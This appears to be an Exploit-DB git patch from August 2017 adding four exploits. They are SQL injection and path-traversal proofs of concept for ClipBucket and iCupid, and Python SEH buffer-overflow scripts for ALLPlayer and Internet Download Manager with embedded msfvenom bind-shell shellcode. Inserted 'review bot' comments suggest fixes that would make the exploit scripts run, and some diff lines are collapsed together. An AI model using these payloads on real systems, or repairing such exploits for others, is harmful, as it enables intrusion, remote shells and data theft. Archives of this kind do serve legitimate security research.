From c76dbe0defbf3b3a9415f9e6f96c6877a81344bd Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 16 Aug 2017 05:01:20 +0000
Subject: [PATCH] DB: 2017-08-16
4 new exploits
Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion
Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)
Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)
ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)
Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)
Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting
Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting
AdvanDate iCupid Dating Software 12.2 - SQL Injection
ClipBucket 2.8.3 - Multiple Vulnerabilities
---
 files.csv | 10 +++--
 platforms/php/webapps/42457.txt | 65 ++++++++++++++++++++++++++++++
 platforms/php/webapps/42458.txt | 28 +++++++++++++
 platforms/windows/local/42455.py | 54 +++++++++++++++++++++++++
 platforms/windows/local/42456.py | 69 ++++++++++++++++++++++++++++++++
 5 files changed, 223 insertions(+), 3 deletions(-)
 create mode 100755 platforms/php/webapps/42457.txt
 create mode 100755 platforms/php/webapps/42458.txt
 create mode 100755 platforms/windows/local/42455.py
 create mode 100755 platforms/windows/local/42456.py
diff --git a/files.csv b/files.csv
index 2f4ace62b..853f36f7a 100644
--- a/files.csv
+++ b/files.csv
@@ -5392,7 +5392,7 @@ id,file,description,date,author,platform,type,port
 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
-41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
+41454,platforms/windows/dos/41454.html,"Microsoft Edge / Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
 41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)",2017-02-26,"Andrey Konovalov",linux,dos,0
 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
@@ -5429,7 +5429,7 @@ id,file,description,date,author,platform,type,port
 41658,platforms/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0
 41659,platforms/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos,0
 41660,platforms/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",multiple,dos,0
-41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0
+41661,platforms/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos,0
 41667,platforms/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,windows,dos,0
 41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
 41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
@@ -9180,6 +9180,8 @@ id,file,description,date,author,platform,type,port
 42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0
 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3)/6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
+42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
+42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37999,7 +38001,7 @@ id,file,description,date,author,platform,type,port
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
-42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
+42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@@ -38254,3 +38256,5 @@ id,file,description,date,author,platform,type,port
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
+42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0
+42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0
diff --git a/platforms/php/webapps/42457.txt b/platforms/php/webapps/42457.txt
new file mode 100755
index 000000000..990faede9
--- /dev/null
+++ b/platforms/php/webapps/42457.txt
@@ -0,0 +1,65 @@
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+.:. Exploit Title > ClipBucket 2.8.3 - Multiple Vulnerabilities
+
+.:. Google Dorks .:.
+"Forged by ClipBucket"
+inurl:view_collection.php?cid=
+
+.:. Date: August 15, 2017
+
+.:. Exploit Author: bRpsd
+.:. Skype contact: vegnox
+.:. Mail contact: cy@live.no
+
+.:. Vendor Homepage > https://clipbucket.com/latest
+.:. Software Link > https://github.com/arslancb/clipbucket/archive/4829.zip
+.:. Version: 2.8.3 latest!
+.:. Tested on > Linux, on local xampp
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+
+
+Vulnerability 1: Blind SQL Injection
+
+Type: boolean
+File: /view_collection.php
+Parameter: cid
+
+
+.:. POC .:.
+
+http://localhost/view_collection.php?cid=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--&type=photos [columns count]
+http://localhost/view_collection.php?cid=1 AND 1=1&type=photos [true]
+http://localhost/view_collection.php?cid=1 AND 1=2&type=photos [false]
+
+
+
+
+
+Vulnerability 2: Arbitrary File Read/Write
+
+NOTE: Access Requires Admin Privilege!
+
+File: /admin_area/template_editor.php
+Parameter: file
+
+.:. POC .:.
+
+The template editor is suppose to allow editing html/css files only, but if you modify the file parameter you can escape the template directory then view OR edit any file actually of any extension.
+
+http://localhost/admin_area/template_editor.php?dir=cb_28&file=../../../index.php&folder=layout
+
+
+
+
+
+Vulnerability 3: Default & Weak admin password
+
+When you setup the CMS, the admin password is autocomplete set as [admin] unless you change it, lazy people will skip changing that field and end up having username and password as 'admin' which is pretty easy to guess!
+
+
+
+
+
+
+-Be safe.
\ No newline at end of file
diff --git a/platforms/php/webapps/42458.txt b/platforms/php/webapps/42458.txt
new file mode 100755
index 000000000..2469addb7
--- /dev/null +++ b/platforms/php/webapps/42458.txt @@ -0,0 +1,28 @@ +# # # # # +# Exploit Title: iCupid Dating Software 12.2 - SQL Injection +# Dork: N/A +# Date: 15.08.2017 +# Vendor Homepage : https://www.advandate.com/ +# Software Link: https://www.advandate.com/dating-software-features/ +# Demo: https://demo.advandate.com/ +# Version: 12.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/index.php?dll=music&sub=search&keyword=[SQL] +# '+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''=' +# +# Etc... +# # # # # + + diff --git a/platforms/windows/local/42455.py b/platforms/windows/local/42455.py new file mode 100755 index 000000000..c291a38e4 --- /dev/null +++ b/platforms/windows/local/42455.py 
@@ -0,0 +1,54 @@ +#!/usr/bin/python +# Exploit Title: ALL Player v7.4 SEH Buffer Overflow (Unicode) +# Version: 7.4 +# Date: 15-08-2017 +# Exploit Author: f3ci +# Tested on: Windows 7 SP1 x86 + +head = "http://" +seh = "\x0f\x47" #0x0047000f +nseh = "\x61\x41" #popad align +junk = "\x41" * 301 +junk2 = "\x41" * 45 + +#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed +BufferRegister=EAX -f python +#x86/unicode_mixed succeeded with size 782 (iteration=0) +#Payload size: 782 bytes +buf = "" +buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ" +buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA" +buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk" +buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7" +buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9" +buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M" +buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD" +buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB" +buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj" +buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP" +buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW" +buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM" +buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F" +buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv" +buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA" + +#venetian +ven = "\x56" #push esi +ven += "\x41" #align +ven += "\x58" #pop eax +ven += "\x41" #align +ven += "\x05\x04\x01" #add eax,01000400 +ven += "\x41" #align +ven += "\x2d\x01\x01" #add eax,01000100 +ven += "\x41" #align +ven += "\x50" #push eax +ven += "\x41" #align +ven += "\xc3" #ret + +buffer = head + junk + nseh + seh + ven + junk2 + buf + +print len(buffer) +f=open("C:\Users\Lab\Desktop\player.m3u",'wb') +f.write(buffer) +f.close() + 
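Review bot: The line `BufferRegister=EAX -f python` that follows the `#msfvenom ...` comment carries no `#`, so Python parses it as code and the script stops with a SyntaxError before it writes anything; it looks like a mail-client wrap of the preceding comment line and should be rejoined or prefixed with `#`. The same wrapped comment lines appear in platforms/windows/local/42456.py (`SEH Buffer Overflow (Unicode)`, `into 'Find file' text field` and `BufferRegister=EAX -a x86 --platform windows -f python`), which should be fixed the same way. Separately, the output path `"C:\Users\Lab\Desktop\player.m3u"` only works because Python 2 leaves unknown escapes such as `\U` and `\L` untouched; under Python 3 `\U` is a truncated Unicode escape and a SyntaxError, so `with open(r"C:\Users\Lab\Desktop\player.m3u", 'wb') as f:` is the portable form and also closes the handle on error. Since `print len(buffer)` already makes the script Python 2 only, the header comment could state that requirement explicitly.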
diff --git a/platforms/windows/local/42456.py b/platforms/windows/local/42456.py new file mode 100755 index 000000000..8032c4b69 --- /dev/null +++ b/platforms/windows/local/42456.py 
@@ -0,0 +1,69 @@ +#!/usr/bin/python +# Exploit Title: Internet Download Manager 6.28 Build 17 - 'Find file' +SEH Buffer Overflow (Unicode) +# Date: 14-06-2017 +# Exploit Author: f3ci +# Tested on: Windows 7 SP1 x86 +# How to exploit: Open IDM -> Downloads -> Find -> paste exploit string +into 'Find file' text field + +#msfvenom -p windows/shell_bind_tcp LHOST=4444 -e x86/unicode_mixed +BufferRegister=EAX -a x86 --platform windows -f python +#Payload size: 782 bytes +buf = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA" +buf += "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ" +buf += "1AIAIAJ11AIAIABABABQI1AIQIAIQI11" +buf += "1AIAJQYAZBABABABABkMAGB9u4JB9lK8" +buf += "4BYpIpM0QPTIwuP1y00dtKr0LpTK22Jl" +buf += "4K1Bn4TKQbMXLOWGNjNFp1KODlml31al" +buf += "zbnLKpI16olMiqfggrhrobNwrkb2N0tK" +buf += "pJmlRk0Lzq2XJCpHkQxQoaRk29o0m1wc" +buf += "dKa9jxzCmjq9dKoDdKm1fvMakOfLfavo" +buf += "jmIqHGOHGp2UzVlCqmjXoKQmKtbUhd28" +buf += "Bk28LdIq7cOvbkJlPKtK0XML9qvsDKlD" +buf += "BkjaHPayq4LdmTQK1KQQR9aJoa9oGpoo" +buf += "OoOjRkZrjKbmOmBHMcp2IpM0RH1g2SNR" +buf += "OopTqXnlQglfzgkOyEtxdPKQIpIpmYy4" +buf += "Ntb0Phlie0rKM09oXU2J9x0Yr0Xb9mq0" +buf += "r0a0npC87zZoyO9PKOj5bwBHJbkPkaQL" +buf += "e97vrJZp0VQGRHy2GknWBGYohUR7phUg" +buf += "Gy08IoyovuogqXsDXlmk8aIoXUR7dWph" +buf += "t5bNpMaQioVuQXrCbM34ypu9Gs1Gogb7" +buf += "01xvrJjr29qF8bim365wPDldoLzajaTM" +buf += "q4ldjpuvypMtR4np26of26Mv0VnnaFaF" +buf += "OcpVPhD9HLOO1vio6u2iwpNnr6pFKO00" +buf += "Ph9xBgMMOpyofuWKHpVUcrr6qXeVruUm" +buf += "3mkO9EOLlFcLJjcPyk9PRUyugK0GN3RR" +buf += "0o2Jip23yoj5AA" + +#venetian +venetian = "\x53" #push ebx +venetian += "\x42" #align +venetian += "\x58" #pop eax +venetian += "\x42" #align +venetian += "\x05\x02\x01" #add eax,01000200 +venetian += "\x42" #align +venetian += "\x2d\x01\x01" #add eax,01000100 +venetian += "\x42" #align +venetian += "\x50" #push esp +venetian += "\x42" #align +venetian += "\xC3" #ret + +nseh = "\x61\x47" # popad +seh = "\x46\x5f" # 0x005f0046 IDMan.exe + +buffer = "\x41" * 2192 #junk +buffer += nseh + 
seh #nseh + seh +buffer += venetian #venetian +buffer += "\x42" * 109 #junk +buffer += buf #shellcode +buffer += "HeyCanYouFind" #junk +buffer += "ThisFileHuh?" #junk + + +filename = "C:\\Users\Lab\Desktop\idm.txt" +file = open(filename, 'w') +file.write(buffer) +file.close() +print buffer +print "[+] File created successfully"
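Review bot: `file = open(filename, 'w')` shadows the Python 2 builtin `file` and opens the output in text mode, while 42455.py in the same commit writes its buffer with `'wb'`; since `buffer` is a byte string, `with open(filename, 'wb') as out: out.write(buffer)` keeps the two scripts consistent and closes the handle on error. The path literal `"C:\\Users\Lab\Desktop\idm.txt"` escapes only the first backslash and relies on `\D` and `\i` being passed through unchanged, so a raw string `r"C:\Users\Lab\Desktop\idm.txt"` would be clearer. `print buffer` then dumps the raw buffer, non-printable bytes included, to the console right after the file is written; printing `len(buffer)` as 42455.py does is the more useful diagnostic. The statement `buffer += nseh + seh #nseh + seh` appears split across two lines in this rendering, so its layout should be checked in the committed file.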